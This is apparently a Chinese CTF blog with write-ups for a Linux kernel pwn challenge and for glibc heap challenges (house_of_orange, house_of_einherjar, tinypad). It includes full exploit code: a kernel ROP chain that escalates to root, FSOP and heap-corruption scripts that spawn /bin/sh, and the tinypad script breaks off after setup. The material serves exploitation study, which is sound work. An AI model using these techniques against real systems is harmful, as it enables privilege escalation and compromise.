那个-s就是代表了-gdb tcp::1234所以并不需要这一行….

然后qemu第一个报错是:Initramfs unpacking failed: incorrect cpio method used: use -H newc option,因为我在之前尝试用

cpio -idmv < core.cpio解包的时候就发现有点问题,所以我就用图形化界面的解包工具把cpio解包了之后再用find . | cpio -o --format=newc > ./root.cpio,把它重新打包了一下

接着发现还是起不起来,找了师傅们的博客,就又把上面.sh中的 -m 64改成了 -m 128

还是起不来(跪,报错:Kernel panic - not syncing: Out of memory and no killable processes…

本来以为是自己虚拟机的问题,先跑过去激活了之前忘记激活的swap分区…然后各种操作,最后….

找了半天原因,…..发现原来是师傅们的128也不行,改成 -m 256M跑起来了,也差不多懂了 qemu 的-m到底是干嘛的……

程序分析

啊….总算可以开始正式写题了

这里记一下一般kernel pwn的步骤吧,就照着师傅们写的来

第一步

先看init函数和fop结构体

1584974897309

可见驱动文件创建于proc下的core文件,在我们的用户程序中对ioctl等驱动函数的访问就是通过core文件来进行的

1584974842581

可以看到fop回调中只实现了如图三个回调,因此,虽然ida左侧的函数列表中还有core_read、core_copy_func但是这俩是驱动内部的函数,是不能由用户程序来调用的

ioctl

1584974968510

根据请求码执行相应的函数

core_read

1584975417499

这里的意思大概就是打印了off还有ioctl第三个参数的值

然后进行了一个类似memset的操作,接着从栈buffer的off偏移位置开始拷贝给用户64字节的数据

显然off如果可控的话就leak了canary或者其他一些东西

然而off在我们传入的控制码为0x6677889C时,就可以直接赋值为ioctl的第三个参数

core_copy_func

1584975853772

这个函数的意思就是ioctl的第三个参数如果大于0x3F时,就会detect到溢出然后直接返回,否则直接从name全局变量中拷入p3个字节的数据到v3这个栈buffer中,但是在memcpy时p3被转换成了unsigned __int16,所以我们在p3为负数时可以实现一个比较大的overflow

core_write

再来看注册过的write函数

1584976661640

user的buffer就是通过这个函数传给name,不过这里看不到v5的赋值

1584976821281

在汇编里面可以看到这个赋值是通过rsi来进行的

所以流程就是这样:

  1. 设置off值
  2. 泄露canary
  3. 把rop链写进name变量
  4. 利用无符号整型漏洞进行栈溢出写rop链

ret2user&exp

1584977702149

注意init脚本中拷贝了一份内核函数表到/tmp/kallsyms,可以供我们直接读到内核函数地址,此时读到的符号在开启kaslr下就是读到的kaslr后的地址,可以减去没有开kaslr时的偏移

对于kernel pwn的exp的话先看别人是怎么写的吧,然后自己再慢慢学着写,模板肯定都是差不多的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/ioctl.h>
void save_status(void);		/* save the user-mode register state needed for the return to user space */
size_t find_symbols(void);	/* read /tmp/kallsyms to get the function addresses under KASLR */
void getpwn(void);		/* run /bin/sh */

/* Wrappers that talk to the driver through its ioctl request codes. */
void core_copy_func(int fd,long long int size);
void core_read(int fd,char* buf);
void setoff(int fd,int size);	/* was missing: main() calls setoff() before its definition */

/* Kernel base computed by find_symbols() from the addresses it reads. */
size_t vmlinux_base = 0;
/* Addresses of the two credential functions, filled in by find_symbols(). */
size_t commit_creds = 0, prepare_kernel_cred = 0;
/* Kernel load base when KASLR is off; main() subtracts it from vmlinux_base to get the slide. */
size_t raw_vmlinux_base = 0xffffffff81000000;
/* User-mode register values captured by save_status() and placed after the iretq gadget. */
size_t user_cs, user_ss, user_rflags, user_sp;

/*
 * Exploit driver: leak the stack canary through the driver's read ioctl,
 * stage a ROP chain in the driver's name buffer with write(), then trigger
 * the stack overflow in core_copy_func with a size whose low 16 bits are 0x100.
 */
int main()
{
	save_status();
	int fd = open("/proc/core", O_RDWR);
	if(fd<0)
	{
		puts("[*] open /proc/core error");
		exit(0);
	}
	find_symbols();
	/* raw_vmlinux_base is the kernel load base without KASLR, so this is the KASLR slide */
	size_t offset=vmlinux_base-raw_vmlinux_base;
	setoff(fd,0x40);	/* set off to the offset of the canary */
	char buf[0x40]={0};
	core_read(fd,buf);	/* read the canary into buf */

	/* memcpy instead of a (size_t *) cast: no aliasing or alignment assumptions */
	size_t canary;
	memcpy(&canary, buf, sizeof canary);
	/* %p requires a void * argument; canary is a size_t */
	printf("[*] canary :%p\n", (void *)canary);
	size_t rop[0x1000];
	int i;
	for(i=0;i<10;i++)
	{
		rop[i]=canary;
	}
	rop[i++] = 0xffffffff81000b2f + offset; // pop rdi; ret
	rop[i++] = 0;
	rop[i++] = prepare_kernel_cred; // prepare_kernel_cred(0)

	rop[i++] = 0xffffffff810a0f49 + offset; // pop rdx; ret
	rop[i++] = 0xffffffff81021e53 + offset; // pop rcx; ret   (rdx = &'pop rcx; ret')
	rop[i++] = 0xffffffff8101aa6a + offset; // mov rdi, rax; call rdx; moves the prepare_kernel_cred(0) result into rdi
	// call rdx -> pop rcx: pops the return address pushed by the call into rcx;
	// it has no purpose other than letting the ret continue with the next chain entry
	rop[i++] = commit_creds; // commit_creds(rdi)

	rop[i++] = 0xffffffff81a012da + offset; // swapgs; popfq; ret
	rop[i++] = 0; // consumed by the popfq in the gadget

	rop[i++] = 0xffffffff81050ac2 + offset; // iretq; ret; the saved user-mode state is used from here on
	rop[i++] = (size_t )getpwn;
	rop[i++] = user_cs;
	rop[i++] = user_rflags;
	rop[i++] = user_sp;
	rop[i++] = user_ss;
	/* the driver registers a write handler, so write() stores the chain in its name buffer */
	write(fd,rop,0x800);
	/* then trigger the copy that overflows the kernel stack */
	core_copy_func(fd,0xffffffffffff0000 | (0x100));


	return 0;
}
/* Announce the step, then issue ioctl request 0x6677889A with size as its argument. */
void core_copy_func(int fd,long long int size)
{
	const int request = 0x6677889A;

	puts("[*] going core_copy_func");
	ioctl(fd, request, size);
}
/*
 * Landing function after the return to user mode: start /bin/sh when the
 * process now runs as uid 0, otherwise report the failure. Exits with 0
 * in both cases.
 */
void getpwn()
{
	if (getuid() != 0)
		puts("[*] get shell error");
	else
		system("/bin/sh");

	exit(0);
}
/* Announce the step, then issue ioctl request 0x6677889B with buf as its argument. */
void core_read(int fd,char* buf)
{
	const int request = 0x6677889B;

	puts("[*] going core_read");
	ioctl(fd, request, buf);
}
/* Announce the step, then issue ioctl request 0x6677889C with size as its argument. */
void setoff(int fd,int size)
{
	const int request = 0x6677889C;

	puts("[*] going setoff");
	ioctl(fd, request, size);
}
/*
 * Store cs, ss, rsp and the flags register into the globals user_cs,
 * user_ss, user_sp and user_rflags, then print a confirmation.
 * NOTE(review): the operands are in Intel order (destination first), which
 * presumably needs the compiler's Intel assembler syntax option - confirm
 * against the actual build command.
 */
void save_status()
{
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("[*]status has been saved.");
}
/*
 * Scan /tmp/kallsyms for the first lines mentioning commit_creds and
 * prepare_kernel_cred, store their addresses in the globals of the same
 * name and derive vmlinux_base from them.
 *
 * Returns 0 once both addresses are known. Prints a message and exits the
 * process if the file cannot be opened or a symbol is missing.
 */
size_t find_symbols()
{
	FILE *kallsyms_fd = fopen("/tmp/kallsyms", "r");
	/* FILE* kallsyms_fd = fopen("./test_kallsyms", "r"); */
	char buf[0x30] = {0};

	/* fopen() reports failure with NULL; a FILE * is never "negative" */
	if (kallsyms_fd == NULL)
	{
		puts("[*]open kallsyms error!");
		exit(0);
	}

	/* logical &&: stop reading as soon as both addresses are known */
	while (!(commit_creds && prepare_kernel_cred)
	       && fgets(buf, sizeof buf, kallsyms_fd))
	{
		if (strstr(buf, "commit_creds") && !commit_creds)
		{
			/* each line starts with the 16-digit hex address; %zx matches size_t */
			if (sscanf(buf, "%16zx", &commit_creds) == 1)
			{
				printf("commit_creds addr: %p\n", (void *)commit_creds);
				vmlinux_base = commit_creds - 0x9c8e0;
				printf("vmlinux_base addr: %p\n", (void *)vmlinux_base);
			}
		}

		if (strstr(buf, "prepare_kernel_cred") && !prepare_kernel_cred)
		{
			if (sscanf(buf, "%16zx", &prepare_kernel_cred) == 1)
			{
				printf("prepare_kernel_cred addr: %p\n", (void *)prepare_kernel_cred);
				vmlinux_base = prepare_kernel_cred - 0x9cce0;
			}
		}
	}

	fclose(kallsyms_fd);

	if (!(prepare_kernel_cred && commit_creds))
	{
		puts("[*]Error!");
		exit(0);
	}

	return 0;
}

调试过程

现在有了exp还有思路当然要自己调试的看一看了,具体调试我使用的是pwndbg

先把编译好的exp打包进root.cpio中(解包打包操作前面有了)(编译命令是师傅教我的musl-gcc -static -O2 exp.c -o exp)

然后用./rootstart把qemu起起来,执行 gdb vmlinux

接着依次执行 set architecture i386:x86-64 和 target remote :1234

这里我调试的时候第一次断在了0xffffffffc00000cc,地址是通过root模式下lsmod显示的驱动base加上IDA中偏移后得来的,所以感觉nokaslr下调试会方便一些(有kaslr时感觉断点都不太好下),断的地方就是在core_read中copy_to_user处

1585008529686

断下来了之后是这样的

栈上的情况大致如下:

1585008988570

这里分别是canary、ebp(这个ebp似乎直接返回到用户栈去了)、返回地址(对应我们驱动中ioctl的地址)

copy_to_user之后就可以获得8*8个栈上的数据,当然就包括canary还有一些地址了

1585009204137

然后从内核态返回用户态似乎是从__do_softirq+328这里返回的

1585009743004

最后断在qmemcpy之后(中间的感觉不用断了…挺好理解的),可以看到栈上的数据已经被改成了各种gadget还有返回时需要的寄存器值

调试的时候log_buf_vmcoreinfo_setup+209好像就是执行prepare_kernel_cred(0)

msg_print_ext_body+227就是执行commit_creds(rdi)

1585010675845

最后执行到最后ret之前就是这样了,返回用户态执行/bin/sh(那个0x400430就是我们的getpwn),就是从ring0直接调用,所以弹给我们的就是root的shell了

至于这个程序的kaslr没有特意去绕是因为我们直接读取了/tmp/kallsyms,从而减去没有kaslr时的内核函数基地址就可以得到加载偏移,不过内核函数加载地址和我们驱动加载地址似乎是被kaslr映射在不同的地方的,需要的情况下得分别leak才行(比如我们上面read时leak了很多内容)

我们这个程序也刚好没有使用到驱动的gadget,所以只用leak内核函数基址就好了

./start脚本去实测的效果就是这样:

1585011340948

ps:这个kaslr似乎后很多位的off都是相同的

这里再给出一个CTF比赛时打远程的脚本(来自林国鹏师傅):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2019 saltedfish <[email protected]>
#
# Distributed under terms of the MIT license.
from pwn import *
import sys
import os

context.log_level = 'debug'
# Shell prompt that exploit() waits for before sending each command.
cmd = '$ '

# Connection to the remote challenge; this is the tube to hand to exploit().
p=remote('192.168.3.255',1234)
def exploit(r):
    """Build exp.c locally, upload it through the remote shell and run it.

    The binary is gzip-compressed, sent base64-encoded inside a shell
    heredoc, decoded and unpacked on the target, made executable and
    started; the session is then handed over to the user.
    Python 2 only: str.encode('base64') does not exist on Python 3.
    """
    r.sendlineafter(cmd, 'stty -echo')

    for local_cmd in ('musl-gcc -static -O2 exp.c -o exp',
                      'gzip -c exp > exp.gz'):
        os.system(local_cmd)

    r.sendlineafter(cmd, 'cat <<EOF > exp.gz.b64') #heredoc
    encoded = read('exp.gz').encode('base64')
    r.sendline(encoded)
    r.sendline('EOF')

    for remote_cmd in ('base64 -d exp.gz.b64 > exp.gz',
                       'gunzip exp.gz',
                       'chmod +x ./exp',
                       './exp'):
        r.sendlineafter(cmd, remote_cmd)

    r.interactive()

# The connection object is named p; r only exists as exploit()'s parameter.
exploit(p)

how2heap - house_of_orange&houseoforange

ubuntu16.04 libc2.23

house_of_orange.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int winner ( char *ptr);

/*
 * house_of_orange walkthrough: corrupt the top chunk size, get the old top
 * placed in the unsorted bin without calling free(), then use an
 * unsorted-bin write on _IO_list_all plus a fake FILE structure (FSOP) so
 * that the abort path ends up calling winner("/bin/sh").
 */
int main()
{
char *p1, *p2;
size_t io_list_all, *top;



p1 = malloc(0x400-0x10);// allocate a chunk whose total size is 0x400 (the original note calls it a small chunk)


top = (size_t *) ( (char *) p1 - 16 + 0x400);// top = &top_chunk
top[1] = 0xc01;// top_chunk.size = 0xc01: the address top_chunk + size must be page aligned, and prev_inuse must be set


p2 = malloc(0x1000);// request more than top_chunk.size; the old 0xc01 top chunk is then put into the unsorted bin

io_list_all = top[2] + 0x9a8;// top's fd + 0x9a8 equals the address of io_list_all in libc

top[3] = io_list_all - 0x10;// point top's bk at io_list_all-0x10 for the arbitrary write bck->fd = unsorted_chunks (av); the value written is the address of main_arena.top (&main_arena.top)

memcpy( ( char *) top, "/bin/sh\x00", 8);// write /bin/sh onto the top chunk


top[1] = 0x61;// on the later malloc(10) this size makes the chunk land at the matching chain position



_IO_FILE *fp = (_IO_FILE *) top;
/////////////////////////////////////////////////////////////the usual FSOP setup starts here
fp->_mode = 0; // top+0xc0


fp->_IO_write_base = (char *) 2; // top+0x20
fp->_IO_write_ptr = (char *) 3; // top+0x28


size_t *jump_table = &top[12]; // controlled memory
jump_table[3] = (size_t) &winner;
*(size_t *) ((size_t) fp + sizeof(_IO_FILE)) = (size_t) jump_table; // top+0xd8
///////////////////////////////////////////////////////////////////////////////
malloc(10);// malloc(0x10): the size mismatch triggers the arbitrary write; afterwards unsortedbin->bk points at io_list_all-0x10, whose size field is 0, which triggers malloc_printerr
// malloc_printerr triggers _IO_flush_all_lockp, and following the chain completes the FSOP (per the original note, the chain hijack works because the _mode value at the matching offset in main_arena is not 0)
// winner then runs; IO_FILE functions are called in the form f(ptr), so the final call is _IO_OVERFLOW(fp, EOF) => system(&top)
// and the string at top is /bin/sh at that point, so a shell is spawned

return 0;
}

/*
 * Target of the hijacked vtable slot: hands ptr to system() as a shell
 * command. The command's exit status is discarded; always returns 0.
 */
int winner(char *ptr)
{
	const int done = 0;

	system(ptr);
	return done;
}

由于源how2heap上的代码注释太多,要是对具体有疑问的推荐去看一下源代码上的注释,我这个主要是总结用,还有以后参考用

整个过程是一个很巧妙的过程,没有通过free,就是通过top_chunk和unsortedbin attack实现了这个利用,全程也不是特别难理解,我的调试过程就是看了一下到底是哪出错调用的malloc_printerr

houseoforange

程序分析

build

1584105896359

最多只能build 4次,对应的chunk联系如下图所示

1584105957540

其中Orange和price_color_chunk都是固定大小的,而且price_color_chunk是calloc出来的chunk

name是我们自己控制大小的一个chunk,最大可为0x1000

see

1584106502771

基本就是打印我们的name还有price,加上一个我们指定颜色的橘子

upgrade

1584106661589

最多只允许upgrade两次,其中更新时的length是我们自己输入的,存在一个溢出,然后就是更新price和color

漏洞分析&Exploit

漏洞点应该说很容易理解,就是upgrade中的overflow,主要就在于我们应该怎么利用。首先程序没有free,所以很多利用都没办法下手了,但是前面刚好学到了house_of_orange,是一个不需要用free即可实现的漏洞,再来看

build中的chunk申请顺序是:malloc(0x10);malloc(len);calloc(8)

然后我们的溢出产生在第二个chunk上,可以溢出到calloc出来的chunk还有topchunk

所以这里先build一个house来修改topchunk的size,和前面house_of_orange.c中一样,设置时保持top+size+0x20页对齐,用于后续利用

设置好之后build第二个house,此时指定name为0x1000大小,即可把原来的topchunk放到unsortedbin

这个时候再进行第三次build,指定name稍微小一点,保证这次build出来的house都是从top中切出来的,然后就可以进行溢出修改、leak的操作了

最后一次build触发FSOP即可……..?是不是还少了点什么,因为我们FSOP的时候需要把vtable指向一个我们可以控制的地方,但是我还没有leak heap或者PIE啊….这怎么办,后来再查阅wp的时候知道了通过切割largechunk时残留的fd_nextsize和bk_nextsize leak的操作….说实话因为largebin在写题的时候用到的少所以没有想到XD…记下来免得以后不记得

PS:顺带记一下fd_nextsize和bk_nextsize会被清空的情况

  1. 从unsortedbin中唯一last remainder中切出来的时候(malloc.c:3494)
  2. 从largebin中切割出的remainder放入unsortedbin时,如果remainder的size仍是属于largebin的,就将这两个ptr清空
    (malloc.c:3645)(我们最后堆地址泄露就是通过从这切出来的large victim chunk)
  3. 一个属于largesize的chunk,free被链入unsortedbin时

完整EXP

有了上面思路之后写WP就很好说了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

# Local target: start the binary on a pty with ASLR enabled.
binary = './houseoforange' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

# Pad a short leak with NUL bytes up to 8 / 4 bytes before unpacking it.
my_u64 = lambda x: u64(x.ljust(8, '\x00'))
my_u32 = lambda x: u32(x.ljust(4, '\x00'))
# NOTE(review): the two constants below are not referenced anywhere in the visible script.
global_max_fast=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
    """Log `what` followed by an arrow and `address` in hex, wrapped in ANSI colour codes."""
    message = "\033[1;36m" + what + '----->' + hex(address) + "\033[0m"
    log.info(message)

# todo here
def build(length,name,price,color):
    """Drive menu option 1 (build): send the name length, name, price and colour in turn."""
    p.sendafter('Your choice : ', '1')
    answers = (
        ('of name :', str(length)),
        ('Name :', name),
        ('Price of Orange:', str(price)),
        ('Color of Orange:', str(color)),
    )
    for prompt, reply in answers:
        p.sendafter(prompt, reply)

def upgrade(length,name,price,color):
    """Drive menu option 3 (upgrade): send the name length, name, price and colour in turn."""
    p.sendafter('Your choice : ', '3')
    answers = (
        ('of name :', str(length)),
        ('Name:', name),
        ('Price of Orange:', str(price)),
        ('Color of Orange:', str(color)),
    )
    for prompt, reply in answers:
        p.sendafter(prompt, reply)

def see():
    """Drive menu option 2 (see); the caller reads the printed house afterwards."""
    p.sendafter('Your choice : ', '2')

# First house: three small chunks directly in front of the top chunk.
build(0x10,'a'*0x10,1,0xDDAA)#0x20 0x20 0x20 0x20fa1
# Overflow out of the name chunk; the last qword overwrites the top chunk size with 0xfa1.
payload='a'*0x18+p64(0x21)+p64(0xddaa00000001)+p64(0)*2+p64(0xfa1)
upgrade(0x40,payload,1,0xDDAA)
# A 0x1000-byte name is larger than the shrunken top, so the old top goes to the unsorted bin.
build(0x1000,'\x00'*0x1000,1,0xDDAA)
build(0x400,'*'*0x8,1,0xDDAA)#when the size is largesize, the split victim chunk will remain the fd_nextsize&bk_nextsize

# The 8 '*' bytes are followed by a pointer left in the chunk; it is treated as a libc address.
see()
p.recvuntil("********")
libc_base=my_u64(p.recv(6))-0x3c5188
loginfo("libc_base:",libc_base)

# Fill 16 bytes so the next leftover pointer is printed; it is treated as a heap address.
upgrade(0x10,'*'*0x10,1,0xDDAA)
see()
p.recvuntil('****************')
heap_base=my_u64(p.recv(6))-0xc0
loginfo("heap_base",heap_base)

# Second overflow: a chunk starting with "/bin/sh" and size 0x61 whose bk is libc_base+0x3c5520-0x10,
# followed by the fake FILE fields, a pointer to heap_base+0x5c0 and the address of system.
payload='\x00'*0x408+p64(0x21)+p64(0xddaa00000010)+p64(0)+'/bin/sh\x00'+p64(0x61)+p64(0)+p64(libc_base+0x3c5520-0x10)
payload+=(p64(0)+p64(1)).ljust(0xb0,'\x00')+p64(0)
payload=payload.ljust(0xc8,'\x00')+p64(heap_base+0x5c0)+p64(0)+p64(libc.symbols['system']+libc_base)

upgrade(len(payload),payload,1,0xDDAA)

# Choosing "build" once more makes the program allocate again, which triggers the FSOP.
p.recvuntil('Your choice : ')
p.send('1')

p.interactive()
'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)
fastbin addree to size: (offset_to_fastbinY/8+2)<<(4 or 3)
largebin chunksize:0x410|0x450|0x490|0x4C0...
'''

how2heap - house_of_einherjar&tinypad

ubuntu16.04 libc2.23

house_of_einherjar.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

/*
Credit to st4g3r for publishing this technique
The House of Einherjar uses an off-by-one overflow with a null byte to control the pointers returned by malloc()
This technique may result in a more powerful primitive than the Poison Null Byte, but it has the additional requirement of a heap leak.
*/

int main()
{
fprintf(stderr, "Welcome to House of Einherjar!\n");
fprintf(stderr, "Tested in Ubuntu 16.04 64bit.\n");
fprintf(stderr, "This technique only works with disabled tcache-option for glibc, see build_glibc.sh for build instructions.\n");
fprintf(stderr, "This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.\n");

uint8_t* a;
uint8_t* b;
uint8_t* d;

fprintf(stderr, "\nWe allocate 0x38 bytes for 'a'\n");
a = (uint8_t*) malloc(0x38);
fprintf(stderr, "a: %p\n", a);

int real_a_size = malloc_usable_size(a);
fprintf(stderr, "Since we want to overflow 'a', we need the 'real' size of 'a' after rounding: %#x\n", real_a_size);

// create a fake chunk
fprintf(stderr, "\nWe create a fake chunk wherever we want, in this case we'll create the chunk on the stack\n");
fprintf(stderr, "However, you can also create the chunk in the heap or the bss, as long as you know its address\n");
fprintf(stderr, "We set our fwd and bck pointers to point at the fake_chunk in order to pass the unlink checks\n");
fprintf(stderr, "(although we could do the unsafe unlink technique here in some scenarios)\n");

size_t fake_chunk[6];

fake_chunk[0] = 0x100; // prev_size is now used and must equal fake_chunk's size to pass P->bk->size == P->prev_size
fake_chunk[1] = 0x100; // size of the chunk just needs to be small enough to stay in the small bin
fake_chunk[2] = (size_t) fake_chunk; // fwd
fake_chunk[3] = (size_t) fake_chunk; // bck
fake_chunk[4] = (size_t) fake_chunk; //fwd_nextsize
fake_chunk[5] = (size_t) fake_chunk; //bck_nextsize


fprintf(stderr, "Our fake chunk at %p looks like:\n", fake_chunk);
fprintf(stderr, "prev_size (not used): %#lx\n", fake_chunk[0]);
fprintf(stderr, "size: %#lx\n", fake_chunk[1]);
fprintf(stderr, "fwd: %#lx\n", fake_chunk[2]);
fprintf(stderr, "bck: %#lx\n", fake_chunk[3]);
fprintf(stderr, "fwd_nextsize: %#lx\n", fake_chunk[4]);
fprintf(stderr, "bck_nextsize: %#lx\n", fake_chunk[5]);

/* In this case it is easier if the chunk size attribute has a least significant byte with
* a value of 0x00. The least significant byte of this will be 0x00, because the size of
* the chunk includes the amount requested plus some amount required for the metadata. */
b = (uint8_t*) malloc(0xf8);
int real_b_size = malloc_usable_size(b);

fprintf(stderr, "\nWe allocate 0xf8 bytes for 'b'.\n");
fprintf(stderr, "b: %p\n", b);

uint64_t* b_size_ptr = (uint64_t*)(b - 8);
/* This technique works by overwriting the size metadata of an allocated chunk as well as the prev_inuse bit*/

fprintf(stderr, "\nb.size: %#lx\n", *b_size_ptr);
fprintf(stderr, "b.size is: (0x100) | prev_inuse = 0x101\n");
fprintf(stderr, "We overflow 'a' with a single null byte into the metadata of 'b'\n");
a[real_a_size] = 0;
fprintf(stderr, "b.size: %#lx\n", *b_size_ptr);
fprintf(stderr, "This is easiest if b.size is a multiple of 0x100 so you "
"don't change the size of b, only its prev_inuse bit\n");
fprintf(stderr, "If it had been modified, we would need a fake chunk inside "
"b where it will try to consolidate the next chunk\n");

// Write a fake prev_size to the end of a
fprintf(stderr, "\nWe write a fake prev_size to the last %lu bytes of a so that "
"it will consolidate with our fake chunk\n", sizeof(size_t));
size_t fake_size = (size_t)((b-sizeof(size_t)*2) - (uint8_t*)fake_chunk);
fprintf(stderr, "Our fake prev_size will be %p - %p = %#lx\n", b-sizeof(size_t)*2, fake_chunk, fake_size);
*(size_t*)&a[real_a_size-sizeof(size_t)] = fake_size;

//Change the fake chunk's size to reflect b's new prev_size
fprintf(stderr, "\nModify fake chunk's size to reflect b's new prev_size\n");
fake_chunk[1] = fake_size;

// free b and it will consolidate with our fake chunk
fprintf(stderr, "Now we free b and this will consolidate with our fake chunk since b prev_inuse is not set\n");
free(b);
fprintf(stderr, "Our fake chunk size is now %#lx (b.size + fake_prev_size)\n", fake_chunk[1]);

//if we allocate another chunk before we free b we will need to
//do two things:
//1) We will need to adjust the size of our fake chunk so that
//fake_chunk + fake_chunk's size points to an area we control
//2) we will need to write the size of our fake chunk
//at the location we control.
//After doing these two things, when unlink gets called, our fake chunk will
//pass the size(P) == prev_size(next_chunk(P)) test.
//otherwise we need to make sure that our fake chunk is up against the
//wilderness

fprintf(stderr, "\nNow we can call malloc() and it will begin in our fake chunk\n");
d = malloc(0x200);
fprintf(stderr, "Next malloc(0x200) is at %p\n", d);
}

通篇下来最重要的两点在size_t fake_size = (size_t)((b-sizeof(size_t)*2) - (uint8_t*)fake_chunk);fake_chunk[1] = fake_size;

代码通过模拟漏洞修改了b的prev_inuse位为0,此时再free(b)的话就会触发向后合并,而向后合并时合并的chunk是由prev_size得到的,当我们把prev_size改成了b's chunk header-fake_chunk's header,就会在fake chunk处触发unlink从而导致fake_chunk被合并,而且此时由于紧邻top_chunk,top_chunk就直接被改到我们栈上fake_chunk处去了,再malloc的时候就可以把我们那块fake_chunk malloc出来

某种意义上来说这个好像也和house of force一样?是通过利用topchunk从而malloc出我们想要的地址来,(代码中写到的If it had been modified, we would need a fake chunk inside b where it will try to consolidate the next chunk,就是说如果我们在溢出的时候把size大小更改了,比如从0x101改成0x100,再去进行操作的时候由于此时得到的nextchunk在被更改chunk的内部,所以我们需要能够写到这个地方修改出一个假的chunk头才能不报错)

不过我有一点没弄明白:fake_chunk[0] = 0x100; // prev_size is now used and must equal fake_chunk's size to pass P->bk->size == P->prev_size,因为在这里设置了新top chunk之后好像没必要改这个prev_size?就算把这步操作改成0也还是一样达到了效果,所以这里好像有一个疑点(后来发现只是我单纯的把这个理解成设置top_chunk了,但其实这个利用说白了就是修改prev_size还有chunk的inuse位,用来overlap chunk也是一样的用法)

….感觉慢慢熟悉起堆来之后就不想写debug了23333,因为稍微进GDB看一下就能弄清楚了,所以也是直接撸题吧

tinypad

程序有很多小函数,这里就不做分析了,直接分析主要的逻辑或有漏洞的逻辑

程序分析

read_until

1583305845380

其中当i=len的时候,a1[i]=0的操作下标越界,可能会产生off_by_null

Add

1583304338827

首先从四个memo中获取一个size段为空的下标,然后malloc(size),size为1~0x100之间,对应的chunk也就是在0x20~0x110之间,然后根据存在bss的指针读入size的数据

delete

1583304560937

这里如果读入的下标是1对应数组下标0,判断对应处size是否为零,然后free掉ptr之后把size置零,没有把ptr置零

edit

1583304758155

edit稍微有点意思,因为我们的memo每次做操作都是从+16的位置开始的,开始的时候我没看懂这个是什么意思,后来在edit这里发现这个前面32*_QWORD的空间是用来当缓冲区的,edit之前先把下标对应的chunk中的内容用strcpy拷到memo缓冲区中去,然后用strlen获取缓冲区的长度,并将这段长度的内容输出,接着再通过strlen获取对应chunk中字符串的长度,然后read到缓冲区中去

Exploit&漏洞分析

漏洞应该比较明显了

  1. read_until的off_by_null
  2. 由于每次程序的显示是通过ptr是否为空来判断是否需要输出的,但是由于清除的是size,所以每次都会输出…直接leak各种base
  3. 结合上面的使用house_of_einherjar即可,不过我才知道这个用法原来是只要修改了prev_size然后用就好23333,本来以为是专门用来设置top_chunk的,不过也确实说明了prev_size确实可以改的很大,这是我之前在写题的时候没有想到的

有了漏洞思路之后我的做法大致就是,先malloc四个memo,然后泄露出libc和heap之后再把这几个全部free掉,用于重新构造利用的chunk结构

再次构造的时候大概就是这样:

0x101 0x71 0x101
填上自身指针用于unlink 用于fastbin attack、填上prev_size,还有off_by_null 修改这个chunk的prev_inuse位

free的时候就会直接把这三个全部都放到top_chunk里面去了,还有一个overlap的0x70 fastchunk

后续就是常规的fastbin attack了

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = './tinypad' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

